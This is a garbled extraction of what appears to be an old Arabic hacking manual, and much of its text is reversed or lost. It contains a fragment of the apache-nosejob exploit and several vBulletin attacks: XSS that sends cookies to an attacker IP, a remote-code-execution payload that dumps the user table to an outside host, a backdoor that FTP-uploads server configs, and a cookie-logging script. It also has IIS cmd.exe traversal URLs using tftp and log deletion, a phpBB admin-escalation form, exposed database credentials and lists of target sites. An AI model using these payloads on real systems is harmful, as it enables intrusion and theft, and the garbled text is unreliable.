Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache;("\\\nosejob.c\\\\n\\\\n
printf(\\\"Usage: ./apache-nosejob <;("\\\switches> -h host[:80]\\\\n
printf(\\\" -h host[:port]\\\\tHost to
;("\\\penetrate\\\\n
printf(\\\" -t #\\\\t\\\\t\\\\tTarget
;("\\\id.\\\\n
printf(\\\" Bruteforcing options (all
required, unless -o is
817
;("\\\used!):\\\\n
printf(\\\" -o char\\\\t\\\\tDefault
values for the following
;("\\\OSes\\\\n
printf(\\\" \\\\t\\\\t\\\\t(f)reebsd,
;("\\\(o)penbsd, (n)etbsd\\\\n
printf(\\\" -b 0x12345678\\\\t\\\\tBase
;("\\\address used for bruteforce\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry
0x80000/obsd, 0x80a0000/fbsd,
;("\\\0x080e0000/nbsd.\\\\n
printf(\\\" -d -nnn\\\\t\\\\tmemcpy()
delta between s1 and addr to
;("\\\overwrite\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd,
;("\\\-150/fbsd, -90/nbsd.\\\\n
printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of
time to repeat \\\\\\\\0 in the
;("\\\buffer\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry 36 for
openbsd/freebsd and 42 for
;("\\\netbsd\\\\n
818
printf(\\\" -r #\\\\t\\\\t\\\\tNumber of
times to repeat retadd in the
;("\\\buffer\\\\n
printf(\\\" \\\\t\\\\t\\\\tTry 6 for
openbsd/freebsd and 5 for
;("\\\netbsd\\\\n
;("\\\printf(\\\" Optional stuff:\\\\n
printf(\\\" -w #\\\\t\\\\t\\\\tMaximum
number of seconds to wait for
;("\\\shellcode reply\\\\n
printf(\\\" -c cmdz\\\\t\\\\tCommands
to execute when our shellcode
;("\\\replies\\\\n
printf(\\\" \\\\t\\\\t\\\\taka
;("\\\auto0wncmdz\\\\n
printf(\\\"\\\\nExamples will be
published in upcoming apache;("\\\scalp-HOWTO.pdf\\\\n
printf(\\\"\\\\n--- --- - Potential targets
;("\\\list - --- ---- ------- ------------\\\\n
printf(\\\" ID / Return addr / Target
;("\\\specification\\\\n
819
for(i = 0; i <
(++sizeof(targets)/sizeof(victim); i
printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\",
;(i, targets[i].retaddr, targets[i].type
;(exit(1
{
820
(if(argc < 4
;()usage
;bruteforce = 0
;((memset(&victim, 0, sizeof(victim
while((i = getopt(argc,
(argv, \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1
}
} (switch(i
/* required stuff */
:'\\case \\'h
;("\\\:"\\\ ,hostp = strtok(optarg
if((portp = strtok(NULL, \\\":\\\")) ==
(NULL
;"\\\portp = \\\"80
;break
/* predefined targets */
:'\\case \\'t
if(atoi(optarg) >=
} ((sizeof(targets)/sizeof(victim
;("\\\printf(\\\"Invalid target\\\\n
821
;return -1
{
memcpy(&victim,
&targets[atoi(optarg)],
;((sizeof(victim
;break
/* !bruteforce */
:'\\case \\'b
;++bruteforce
;"\\\victim.type = \\\"Custom target
victim.retaddr = strtoul(optarg,
;(NULL, 16
printf(\\\"Using 0x%lx as the
baseadress while
bruteforcing..\\\\n\\\",
;(victim.retaddr
;break
:'\\case \\'d
;(victim.delta = atoi(optarg
822
printf(\\\"Using %d as delta\\\\n\\\",
;(victim.delta
;break
:'\\case \\'r
;(victim.repretaddr = atoi(optarg
printf(\\\"Repeating the return
address %d times\\\\n\\\",
;(victim.repretaddr
;break
:'\\case \\'z
;(victim.repzero = atoi(optarg
printf(\\\"Number of zeroes will be
;(%d\\\\n\\\", victim.repzero
;break
:'\\case \\'o
;++bruteforce
} (switch(*optarg
:'\\case \\'f
;"\\\victim.type = \\\"FreeBSD
823
;victim.retaddr = 0x80a0000
;victim.delta = -150
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'o
;"\\\victim.type = \\\"OpenBSD
;victim.retaddr = 0x80000
;victim.delta = -146
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'n
;"\\\victim.type = \\\"NetBSD
;victim.retaddr = 0x080e0000
;victim.delta = -90
;victim.repretaddr = 5
;victim.repzero = 42
;break
824
:default
printf(\\\"[-] Better luck next
;("\\\time!\\\\n
;break
{
;break
/* optional stuff */
:'\\case \\'w
;(sc_timeout = atoi(optarg
printf(\\\"Waiting maximum %d
seconds for replies from
;(shellcode\\\\n\\\", sc_timeout
;break
:'\\case \\'c
;cmdz = optarg
;break
:default
;()usage
;break
825
{
{
if(!victim.delta || !victim.retaddr || !
(victim.repretaddr || !victim.repzero
}
printf(\\\"[-] Incomplete target. At
least 1 argument is missing (nmap
;("\\\style!!)\\\\n
;return -1
{
printf(\\\"[*] Resolving target
;("\\\ ..host
;(fflush(stdout
;(he = gethostbyname(hostp
(if(he
;(memcpy(&ia.s_addr, he->h_addr, 4
else if((ia.s_addr = inet_addr(hostp))
} (== INADDR_ANY
printf(\\\"There\\'z no %s on this side
;(of the Net!\\\\n\\\", hostp
826
;return -1
{
;((printf(\\\"%s\\\\n\\\", inet_ntoa(ia
;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
for(owned = 0, progress =
0;;victim.retaddr +=
} (RET_ADDR_INC
/* skip invalid return adresses */
if(memchr(&victim.retaddr, 0x0a, 4)
((|| memchr(&victim.retaddr, 0x0d, 4
;continue
sock = socket(PF_INET,
;(SOCK_STREAM, 0
;sin.sin_family = PF_INET
;sin.sin_addr.s_addr = ia.s_addr
;((sin.sin_port = htons(atoi(portp
827
(if(!progress
;("\\\ ..printf(\\\"[*] Connecting
;(fflush(stdout
if(connect(sock, (struct sockaddr *)
} (& sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n
p = expbuf = malloc(8192 +
((PADSIZE_3 + NOPCOUNT + 1024)
(* REP_SHELLCODE
PADSIZE_1 + (victim.repretaddr *)) +
4) + victim.repzero
;((REP_POPULATOR * (1024 +
PUT_STRING(\\\"GET /
828
HTTP/1.1\\\\r\\\\nHost: \\\"
;("\\\HOST_PARAM \\\"\\\\r\\\\n
(++for (i = 0; i < REP_SHELLCODE; i
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_3,
;(PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
memcpy(p, shellcode,
;(sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
(++for (i = 0; i < REP_POPULATOR; i
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_1,
;(PADDING_1
;("\\\ :"\\\)PUT_STRING
829
;(PUT_STRING(buf
} (if(!shown_length
printf(\\\"[*] Exploit output is %u
bytes\\\\n\\\", (unsigned int)(p ;((expbuf
;shown_length = 1
{
;(write(sock, expbuf, p - expbuf
;++progress
(if((progress%70) == 0
;progress = 1
} (if(progress == 1
printf(\\\"\\\\r[*] Currently using
;(retaddr 0x%lx\\\", victim.retaddr
(++ for(i = 0; i < 40; i
;("\\\ "\\\)printf
;("\\\printf(\\\"\\\\n
(if(bruteforce
831
;('\\;'\\)putchar
{
else
'\\putchar(((rand()>>8)%2)? \\'P\\': \\'p
;(
;(fflush(stdout
;responses = 0
} (while (1
;fd_set fds
;int n
;struct timeval tv
;tv.tv_sec = sc_timeout
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
832
delta=%d, retaddr=0x%lx,
repretaddr=%d, repzero=%d\\\\n\\\",
victim.type, victim.delta,
victim.retaddr, victim.repretaddr,
;(victim.repzero
printf(\\\"Experts say this isn\\'t
exploitable, so nothing will happen
;("\\\ :now
;(fflush(stdout
{
else {
;(write(1, buf, n
{
{
} ((if(FD_ISSET(0, &fds
if((n = read(0, buf, sizeof(buf) - 1)) <
(0
;(exit(1
;(write(sock, buf, n
{
834
{
(if(!owned
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
fprintf(stderr, \\\"Ooops..
;("\\\hehehe!\\\\n
;return -1
{
{
;return 0
{
835
)) angels-
bytes.com ((
?http://www.angels-bytes.com/
show=tools&action=info&id=19
836
" "
837
><
php
) ( vb
/
-1 .
. .
-2
index.php admin
/
>?php
;"LOGIN = "User$
;"PASSWORD = "Password$
838
Password
-3 3000
!!
.
-4 HTML
..
.
-5 . .
.
"
" vBulletin2,2,0
840
><
-------- :
-------- : vBulletin
) WebServer :
( + )( .
:
: vBulletin !!
.
--------- :
-------- . ..
841
..
.. HTML
)
.. ( HTML
:
>script>document.write('<img
src="http://my_ip_address/'+docum
<ent.cookie+'">';</script
IP Adress IP
.
.
.
.. .
)
IIS Apache
842
( .
Log
..
.. Apche
logs . Acces Log
..
.. :
GET/
bbuserid=86;%20bbpassword=dd61
69d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8
;%20bbthreadview[54
%20bblastvi;1012444064=[20
sit=1011983161
..
843
..
..
http://www.victim.com/vb/index.php
?
bbuserid=[userid]&bbpassword=[pa
[ssword hash
" : )
" (....
) ( ..
.. )(
.. Forgot
.. Password
..
!!
! ..
844
-----------
---------- HTML
) + + +
( ... +
) HTML
(
.. IMG
> <script >
<img > <Demon
... .
. Be Secret .. Dont' be Lamer
2002 - 1 - 31 :
2.2.0 .
845
"
"
> <
> : <
7
1
846
2
3 SQL
4
5
6 %80
7
%100
.
****************
1
847
Powered by:
vBulletin
1
2
3
%60
?http://www.vbulletin.org/index.php
topic=<script>alert(document.cooki
<e)</script
2
|?http://www.vbulletin.org/index.php
=forum/view.php&topic=../../../../../../..
/etc/passwd
848
********************
113
) ( Jouko
Pynnonen
)vBulletin (http://www.vbulletin.com/
is a commonly used web forum
system written in PHP. One of its
,key features is use of templates
which allow the board administrator
to dynamically modify the look of
.the board
849
DETAILS
=======
vBulletin templates are
implemented in the following way:
the
gettemplate() function in global.php
851
} ("if ($action=="faq
eval("echo
;(";("\".("dovars(\"".gettemplate("faq
{
function
852
gettemplate($templatename,
} ($escape=1
gets a template from the db or //
from the local cache
;global $templatecache,$DB_site
![if ($templatecache[$templatename
} (""=
$
template=$templatecache[$template
;[name
} else {
gettemp=$DB_site-$
>query_first("SELECT template
FROM template WHERE title='".
;("'".(addslashes($templatename
;[template=$gettemp[template$
$
templatecache[$templatename]=$te
;mplate
{
853
} (if ($escape==1
template=str_replace("\"","\\\"",$
;($template
{
;return $template
{
http://www.site.url/index.php?
action=faq&templatecache[faq]=hell
o+world
With this URL, you won't get the
FAQ page, but just a blank page
."with the words "hello world
The eval() call above will execute
;("echo dovars("hello world
As if this wouldn't be bad enough, a
remote user may as well pass a
value containing quotation marks
and other symbols. Quotation
marks
aren't always escaped as seen in
the code above, in which case
index.php could end up executing
code like
855
;("echo dovars("hello"world
This would produce a PHP error
message due to unbalanced quotes.
It
doesn't take a rocket scientist to
figure out how a remote user could
execute arbitrary code from here, so
further details about exploitation
aren't necessary. If your vBulletin
board produces an error message
with an URL like the one above
prefixed with a single quotation
,mark
.it's definitely vulnerable
The above example works with the
"Lite" version. The commercial
versions
are vulnerable too, but details may
differ. After a little experimenting
on the Jelsoft's test site I found
856
. .
url
hello+world
857
:
-1
vb 113 or 115
) 90 -2
(
url -3
search.php3?
action=simplesearch&query=search
this&templatecache[standardredire
ct]="%29%3B%24fa="<
%261";set_time_limit(substr("900",0
,3));
%24fp=fsockopen(substr("IP.IP.IP.I
P",0,12),substr("90",0,2),
%26%24errno,
%26%24errstr,substr("900" ,0,3));if(!
%24fp)
{}else{%24arr[200];fputs(%24fp,su
bstr("vhak1.0,%20- d%20downloads
858
%20database,or%20press%20return
%20for
%20command%20line" ,0,63));
%24va=fgets(%24fp,3);fputs(%24fp,
%24va);if
strlen(%24va)>1))
{include(substr("admin/config.php",
0,16));include(substr("admin/config.
php3",0,17));mysql_connect(substr(
"%24servername",0,strlen(%24serv
ername)),substr("%24dbusername",
0,strlen(%24dbusername)),substr("
%24dbpassword" ,
0,strlen(%24dbpassword)));
%24currenta=mysql_db_qu
ery(substr("%24dbname",0,strlen(%
24dbname)),substr("select%20*
%20from%20user" ,
0,18));while(%24res=mysql_fetch_ar
859
ray%20(%24curre
nta))
{fputs(%24fp,"%24res[userid],");fpu
ts(%24fp,"%24res[usergroupid],");fp
uts(%24fp,"%24res[password],");fp
uts(%24fp,"%24res
%24arr);
%24str=exec(fgets(%24fp,substr("1
28",0,3)),
%24arr);for(%24ir=substr("0",0,1);
%24ir< sizeof(%24arr);%24ir%2B
%2B){fputs(%24fp,%24arr[%24
ir]);fputs(%24fp,
_%24va);}}fclose(%24fp);}die(vhak
"finished_execution);echo%28
By Kill -9
IP.IP.IP.IP
860
12
127.0.0.1
9
) arabteam2000.com (
c4arab.com
. ...
!!
:
90
d downloads
861
2.2x
113 11
115 225
) WebServer :
( + )( .
:
: vBulletin !!
.
--------- :
--------862
. ..
..
.. HTML
)
.. ( HTML
:
>script>document.write('<img
src="http://my_ip_address/'+docum
<ent.cookie+'">';</script
IP Adress IP
.
.
.
.. .
863
)
IIS Apache
( .
Log
..
.. Apche
logs . Acces Log
..
.. :
GET/
bbuserid=86;%20bbpassword=dd61
69d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8
;%20bbthreadview[54
864
%20bblastvi;1012444064=[20
sit=1011983161
..
..
..
http://www.victim.com/vb/index.php
?
bbuserid=[userid]&bbpassword=[pa
[ssword hash
" : )
" (....
) ( ..
.. )(
865
.. Forgot
.. Password
..
*******************
3 SQL
.
: ) ( SQL
ASP
SQL ASP
SQL
SQL
1433
SQL
866
SQL
.
:
SQL
PHP ASP
_LinuxRay
-. - -
. Administrator
...
867
:
SQL
User Name Passwd
: .
User name
and Passwd ASP
* sql.
htr.+
. :
http://target/page.asp+.htr
: target
: Page asp
: htr.+
868
.
....
View
Source ASP
:
>%
=Set DB
Server.CreateObject("ADODB.Conn
("ection
DB.Open "DRIVER=SQL
;=Server;SERVER=xxx;UID=sa;PWD
APP=Microsoft (R) Developer
Studio;WSID=xxx;DATABASE=moe
"_dbs", "_LinuxRay", "6666666
869
<%
---------------------------------------------------------------- . _
LinuxRay
6666666
-----------------------------------------------------------------
ASP :
AMicrosoft VBScript runtime error
''800a01a8
'Object required: 'Conn
filename.inc, line 5/
* inc.
870
.
.
ASP
database.inc
>!<--"include file = "database.inc#--
global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
871
SQL
:
global.asa+.htr
IIS 3
ASP data$::
file.asp::$data
IIS 3
.
...
.
!! SQL
.
Visual interdev 6.0
872
. ACCESS 2000
File
New
(Project (Exiting Data
.
Create
Data Link Properties
-
. -
- 1 Select or
enter server name
873
- 2 . User Name
- 3 Password
) Blank
(Password
Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
OK .
:
/http://www.moe.gov.sa
-1 :
874
http://www.moe.gov.sa/news_admin
.asp
Microsoft VBScript runtime error
''800a01a8
'Object required: 'Conn
news_admin.asp, line 7/
: htr
http://www.moe.gov.sa/news_admin
.asp+.htr
<--"include file = "database.inc#--!>
875
: database.inc
http://www.moe.gov.sa/database.inc
:
%>
Set DB=
Server.CreateObject("ADODB.Conn
("ection
DB.Open "DRIVER=SQL
Server;SERVER=CNW2;UID=sa;PW
D=;APP=Microsoft (R) Developer
Studio;WSID=CNW2;DATABASE=m
"oe_dbs", "sa", "123321
<%
876
. .
.....
.
:
/http://www.itsalat.com
User name : sa Passwd : sp2000 - 1
*****************
. %80
877
2
1.5 15000
1
2
3
4
6. . %100
IIS
878
IIS
...IIS5.0
4 5
.
.
.
879
:
http://www.xxxxxx.com/scripts/.. ../
\:winnt/system32/cmd.exe?/c+dir+c
.
:c
scripts/../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts../
?%c1%9c../winnt/system32/cmd.exe
\:/c+dir+c
scripts/../
?%c1%pc../winnt/system32/cmd.exe
\:/c+dir+c
880
scripts/../
%c0%9v../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%qf../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c1%8s../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%1c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%e0%80%af../winnt/system32/cmd.e
\:xe?/c+dir+c
scripts/../
881
%f0%80%80%af../winnt/system32/c
\:md.exe?/c+dir+c
scripts/../
%f8%80%80%80%af../winnt/system3
\:2/cmd.exe?/c+dir+c
scripts/..%fc/
%80%80%80%80%af../winnt/system
\:32/cmd.exe?/c+dir+c
msadc/..\%e0\%80\%af../..\/
%e0\%80\%af../..\
%e0\%80\%af../winnt/system32/cmd.
\:exe\?/c\+dir+c
:
http://www.xxxxx.com//////
+\/....2/cmd.exe/?/c
.
Dir
882
32
:
http://www.xxxxxx.com/scripts/.. ../
\:winnt/system32/cmd.exe?/c+dir+c
http://www.xxxxxx.com/scripts/.. ../
\winnt/system32/cmd.exe?/c+dir+c:
\Winnt\Sytem32
883
\Winnt\Sytem32
.....
http://www.xxxxx.com/scripts/..
\:....exe?/c+dir+c
32
\:c+dir+c
http://www.xxxxx.com/scripts/..
/...Winnt/System32
tftp.exe
884
..............................................................
...........................
www.geocities.com/anorR1234/tftpd
32.zip
\:C
tftp32.exe
\:C
--------------------------------------------------885
-------------
=
:
http://www.xxxxx.com/scripts/..
\:....exe?/c+dir+c
c+tftp.exe+"-/
i"+1.1.1.1+GET+index.htm+C:\inetpu
b\wwwroot\index.htm
\:c+dir+c/
886
c+tftp.exe+"-/
i"+1.1.1.1+GET+index.htm+C:\inetpu
b\wwwroot\index.htm
http://www.xxxxx.com/scripts/..
"...xe?/c+tftp.exe+i"+1.1.1.1+GET+index.htm+C:\inetpu
b\wwwroot\index.htm
. .
tftp.exe
" "i-
1.1.1.1 .
GET
index.htm
887
\C:\inetpub\wwwroot
index.htm
\:C
index.htm
http://www.xxxxx.com/scripts/..
"...xe?/c+tftp.exe+i"+212.212.212.212+GET+index.htm
+C:\inetpub\wwwroot\index.htm
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
888
http://server/msadc/..../..../c+del+c
:/*.log
--------------------------------------
*******************
1 .
1
$
889
2
30
3
%100
-
890
2.2.5
forum
:PHP
------------------------------------------------------------------------------} ("if ($action=="modify
;vbxh = h$
;vbxt = t$
;vbxp = p$
;vbxw = w$
;vbxa = a$
;vbx1 = 1$
891
;vbxr = r$
;vbxb = b$
;vbxn = n$
;vbxe = e$
;vbxo = o$
;vbxy =y$
;vbxl = l$
;" --!>" echo
= file$
fopen("$vbxh$vbxt$vbxt$vbxp://
$vbxw$vbxw$vbxw.
$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn
$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbx
a$vbxl/.x.php?
h=$HTTP_HOST&h2=$SCRIPT_NA
;("ME", "r
;(rf = fread($file, 1000$
;(fclose($file
;"<-- " echo
------------------------------------------------------------------------------892
/http://www.arab1.net
?http://www.arab1.net/~royal/.x.php
h=$HTTP_HOST&h2=$SCRIPT_NAM
E
. 2.2.6
option
:PHP
------------------------------------------------------------------------------;" --!>" echo
893
;"include "$sqlupdate
;"<-- " echo
-------------------------------------------------------------------------------
functions
:PHP
------------------------------------------------------------------------------sqlupdate =$
base64_decode('aHR0cDovL3NhdW
RpLm5vLWlwLmNvbS9+cm9
;('==5YWwvLngyLmluYw
------------------------------------------------------------------------------894
/http://saudi.no-ip.com
WELCOME TO
arab1.net
http://saudi.no-ip.com/~royal/.x2.inc
.......
:PHP
------------------------------------------------------------------------------>"div id="sHo
895
<";style="display:none
--!>
if you are seeing this code PlzZzZz
Contact
[email]sleeping_bum@hotmail.com
php?>
;("system("mkdir /tmp/.statics
system("cp
/etc/httpd/conf/httpd.conf
;("/tmp/.statics/httpd1.conf
system("cp
/usr/local/apache/conf/httpd.conf
;("/tmp/.statics/httpd2.conf
system("cp admin/config.php
;("/tmp/.statics/php.conf
system("tar -cvf /tmp/.statics.tgz
;("/tmp/.statics
;"vilename = "$SERVER_NAME.bz$
port =$
;('base64_decode('aHB5NWk5
conn_id = ftp_connect("cyber-$
;("sa.virtualave.net
896
login_result = ftp_login($conn_id,$
;(""cyber-sa", "$port
upload = ftp_put($conn_id, "/tmp/$
$vilename", "/tmp/.statics.tgz",
;(FTP_BINARY
;(ftp_quit($conn_id
;("system("rm -rf /tmp/.statics.tgz
;("system("rm -rf /tmp/.statics
base =$
"$HTTP_HOST&h2=$SCRIPT_NAME
;"
open = "http://saudi.no-$
;"ip.com/~royal/.x2.php?h=$base
;("file = fopen("$open", "r$
;(rf = fread($file, 1000$
;(fclose($file
<?
<-<div/>
897
************
6 %80
.
%80
1
2
3
4
5
6
Cfgwiz32.exe 7
C:\Windows
8 misc
9
898
******
1 htaccess.
2 htaccess.
3
4
5
6
7 . Cfgwiz32.exe
C:\Windows
8
9
10
.
899
Coded By : Sp.IC //
.((SpeedICNet@Hotmail.Com
Descrption: Fetching vBulletin's //
.cookies and storing it into a log file
:Variables //
;"LogFile = "Cookies.Log$
:Functions //
*/
If ($HTTP_GET_VARS['Action'] =
} (""Log
;"--!>" = Header$
;"<---" = Footer$
{
} Else
;"" = Header$
;"" = Footer$
{
901
;(Print ($Header
/*
Print ("<Title>vBulletin XSS
Injection Vulnerability:
;("<Exploit</Title
;("<Print ("<Pre
;("<Print ("<Center
Print ("<B>vBulletin XSS Injection
;("Vulnerability: Exploit</B>\n
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail
.Com\">Sp.IC</A></B><Hr
;("<"\Width=\"20%
*/
;(Print ($Footer
/*
Switch
} (['($HTTP_GET_VARS['Action
:"Case "Log
Data =$
902
;['$HTTP_GET_VARS['Cookie
Data = StrStr ($Data, SubStr$
($Data, BCAdd (0x0D, StrLen
;(((((((DecHex (MD5 (NULL
;("+Log = FOpen ($LogFile, "a$
;("FWrite ($Log, Trim ($Data) . "\n
;(FClose ($Log
Print ("<Meta HTTPEquiv=\"Refresh\" Content=\"0;
URL=" .
$HTTP_SERVER_VARS['HTTP_REF
;("<"\" . ['ERER
;Break
:"Case "List
If (!File_Exists ($LogFile) || !
} ((In_Array ($Records
Print ("<Br><Br><B>There are No
;("<Records</B></Center></Pre
;() Exit
{
} Else
;("<Print ("</Center></Pre
903
{
Print ("o Download Log : " .
;("$Link['Download'] . "\n
Print ("o Clear Records : [<A
Href=\"" . $SCRIPT_PATH. "?
;("Action=Delete\">Y</A>]\n
;("Print ("\n
;("Print ("<B>.:: Records</B>\n
;("Print ("\n
While (List ($Line[0], $Line[1]) =
} ((Each ($Records
Print ("<B>" . $Line[0] . ": </B>" .
;([$Line[1
{
{
;("<Print ("</Pre
;Break
:"Case "Delete
;(UnLink ($LogFile@
905
Print ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>")
Or Die ("<Br><Br><B>Error: Cannot
;("<Delete Log</B></Center></Pre
Print ("<Meta HTTPEquiv=\"Refresh\" Content=\"3;
URL=" .
$HTTP_SERVER_VARS['HTTP_REF
;("<"\" . ['ERER
;Break
{
<?
php -2
-3
member2.php?
s=[Session]&action=viewsubscripti
[on&perpage=[Script Code
[script code]
] //:Script>location='Http>
Action=Log&Cookie='+?[
<(document.cookie);</Script
906
-4
http://%20 / ?
Action=List
907
PhpBB2
admin_ug_auth.php
:
.
:
2.0.0
><html
><head
><head/
909
<body>
"form method="post>
action="http://www.domain_name/b
oard_directory/admin/admin_ug_aut
<"h.php
User Level: <select
<"name="userlevel
option>
value="admin">Administrator</opti
<on
option>
value="user">User</option></select
<
input type="hidden">
<"name="private[1]" value="0
input type="hidden">
<"name="moderator[1]" value="0
input type="hidden" name="mode">
<"value="user
input type="hidden" name="adv">
<""=value
910
/http://forums.xos.ca
...
- -
!!!!
!!! !!!
.....
) :
(
:
PHP Nuke versionh 6.0
. :
.
.
913
. :
. . .
/
.... images/forum/avatars
. ..
.
.
text ..
!!!!
:
.
Your Account
Your Info
view
914
source uid
. :
>"input type="hidden" name="uid
<"value="2111
... 2111
html
/http://nukesite
:......
>!<!-- START CODE --
>"form name="Register
action="http://NUKEDSITE/modules.
"php?name=Your_Account
<"method="post
915
b>Username</b><input>
type="text" name="uname"
"size="30
maxlength="255"><br><b>User
"ID:<input type="text
"name="uid
size="30"><input type="hidden"
"name="op
value="saveuser"><input
type="submit" value="Save
<Changes"></form
<!-- END CODE --!>
916
html ..
:
"<
>b
...
submit Your
Account .. !!!!
:
"<>h1>TESTING</h1><b
TESTING
!!....
917
">b
..
30
....
xss
=(
:
!!!!
. ...
918
" "
:::
.1 .
http://members.lycos.co.uk/hiha
/ck/vb
.2 .
/http://www.e3sar.net/vb
.3 .
/http://www.ebnmasr.net/vb
.4 . .
/http://www.7azm.net/vb
.5 .
http://www.almuhands.org/forum
/index.php
.6 .
/http://www.arabse.net/vb
919
. .7
/http://www.emoataz.com/vb
. .8
/http://www.h4palestine.com
.9
/http://www.pharaonics.net
/http://www.ruwad.tk . .10
. .11
/http://www.nafitha.org
. .12
http://www.arab4vb.com/vb/inde
x.php
. .13
http://www.naajm.com/vb/forumd
isplay.php
...
.
920
921
"
"
) Kroll-O-Nagra
.)/http://www.securify.com
Security Focus
--------------- :
/http://www.securityfocus.com
.
!
BugTraq
------- : ) Security Focus
, /http://www.securityfocus.com
) )) Netspace
.(/http://www.netspace.org
BugTraq
mailing list
. Aleph1
.((aleph1@underground.org
923
) ( .
spams
.
/http://www.securityfocus.com
''search
Searching
-----------
Sendmail 8.8.3 'sendmail
'8.8.3 .
local DoS
sendmail
local DoS' :
'sendmail .
:::
924
/http://rootshell.redi.tk .1
http://www.ussrback.com .2
.3
http://www.insecure.org/sploits.h
tml
.4
http://www.linux.com.cn/hack.co.
za
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=
.
:::
http://www.haker.com.pl .1
.2
/http://www.webattack.com
925
.3 http://blacksun.box.sk
.4
http://www.blackcode.com
/http://www.TipsClub.com
926
927
928